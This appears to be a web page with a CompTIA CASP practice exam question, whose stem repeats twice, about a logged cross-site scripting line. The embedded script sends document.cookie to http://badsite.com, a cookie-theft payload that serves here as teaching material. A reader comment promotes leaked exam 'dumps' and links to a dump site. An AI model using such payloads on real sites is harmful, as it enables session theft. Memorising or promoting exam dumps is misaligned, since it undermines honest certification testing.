A security administrator notices the following line in …

A security administrator notices the following line in a server’s security log:
<input name=’credentials’ type=’TEXT’ value='” +
request.getParameter(‘><script>document.location=’http://badsite.com/?q=’document.cooki e</script>’) + “‘;
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on
the server. Which of the following should the security administrator implement to prevent this particular attack?

A security administrator notices the following line in a server’s security log:
<input name=’credentials’ type=’TEXT’ value='” +
request.getParameter(‘><script>document.location=’http://badsite.com/?q=’document.cooki e</script>’) + “‘;
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on
the server. Which of the following should the security administrator implement to prevent this particular attack?

A.
WAF

B.
Input validation

C.
SIEM

D.
Sandboxing

E.
DAM

Show Hint

Leave a Reply 2

Your email address will not be published. Required fields are marked *

three × 5 =

Tauber

Tauber

Completed CAS-002 exam last week! Got 77 questions, started with 10 SIMs: configuring the firewall ACL, placing equipments in the network to stop attacks, and so on.

I mainly learned the CASP Cert Guide books and practised PassLeader CAS-002 dumps with 900q (new version, helped a lot for my passing).

Dumps on this site are not valid, only 2 SIMs and few MCQs are from them, other 8 SIMs and many MCQs are missing!!!

Recommend to practise PassLeader 900q CAS-002 dumps, especially the last 240 questions. Here you can get PassLeader CAS-002 dumps:

http://www.comptiadump.com/category/comptia-advanced-security-practitioner-casp-certification/cas-002-dumps

GOOD LUCK!!

Reply